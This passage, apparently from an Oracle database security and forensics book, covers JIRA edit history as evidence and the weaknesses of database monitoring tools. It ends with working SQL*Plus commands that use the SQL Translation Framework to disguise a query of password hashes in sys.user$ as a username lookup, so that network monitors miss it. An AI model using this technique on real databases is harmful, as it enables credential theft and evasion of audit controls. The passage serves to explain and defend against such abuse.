Database Reference
In-Depth Information
An interesting external source of evidence is JIRA, which holds the records of changes prior to execution. JIRA is
a common development tool and allows the user to edit a ticket. JIRA provides the ability to record edits and also to
record previous versions of the ticket's contents. If a change ticket has been edited AFTER the change has been made
on production, then a JIRA administrator is able to view the previous versions of the ticket. Not all users realize this
ability and may be caught out. It is interesting to see the ticket being edited after a production change has failed, in
order to cover up the mistake in development.
A third external source of data regarding the usage of the database are the security monitoring logs, such as those
from McAfee (previously Sentrigo), AppSecInc, Guardium, and Imperva. These security monitoring tools however,
tend to suffer from some common weaknesses:
•
Difficulty logging all of the SYS activity.
An attacker will run their commands as SYS, just like
the system itself, and so if the security monitoring tool is not recording SYS actions it is not
effective.
•
Inability to monitor encrypted traffic.
Note that TCPS is a free upgrade on all versions of
Oracle database at time of writing (though is not turned on by default).
•
Bypassable
by sending many commands in one go in a flood (e.g., put the malicious
command in the middle of a batch job). The way to counter this is to increase the sampling
frequency.
•
Increased sampling frequency
reduces the performance capabilities of the tools, typically by
slowing down the database.
•
Non-contexual
in that they are unable to accurately map object and user identities in the DB
context, and there is an inability to audit recursive and dynamic SQL.
The result of these weaknesses is that solutions based upon local memory agents tend to be more secure than
network-based packet-sniffing technologies, and have fewer false positives. However, local memory agent solutions
have potentially higher maintenance requirements as the OS/DB software is upgraded over time. Over the past half
a decade, the security focus for RDBMS has moved more to preventing the abuse of internal privilege escalation.
Network-based monitoring is reading sessions prior to DB itself and is not well positioned to monitor privileged
sessions, hence the rise of memory agent monitoring. An example of how privileged access can be used to bypass
network monitoring solutions such as Guardium is the SQL Translation Framework, which translates one SQL
statement into another SQL statement. The main aim of Translation is to allow a Transact SQL statement to be
converted to Oracle SQL without changing the application, however it can also be used by a privileged user to select
out passwords using a query that looks like it is just querying usernames, as follows:
conn / as sysdba
SQL> exec dbms_sql_translator.create_profile('BYPASSNETMON');
PL/SQL procedure successfully completed.
SQL> select object_name, object_type from dba_objects where object_name like 'BYPASSNETMON';
OBJECT_NAME
--------------------------------------------------------------------------------
OBJECT_TYPE
-----------------------
BYPASSNETMON
SQL TRANSLATION PROFILE
SQL> exec dbms_sql_translator.register_sql_translation('BYPASSNETMON','select username from
dba_users','select user, password from sys.user$')
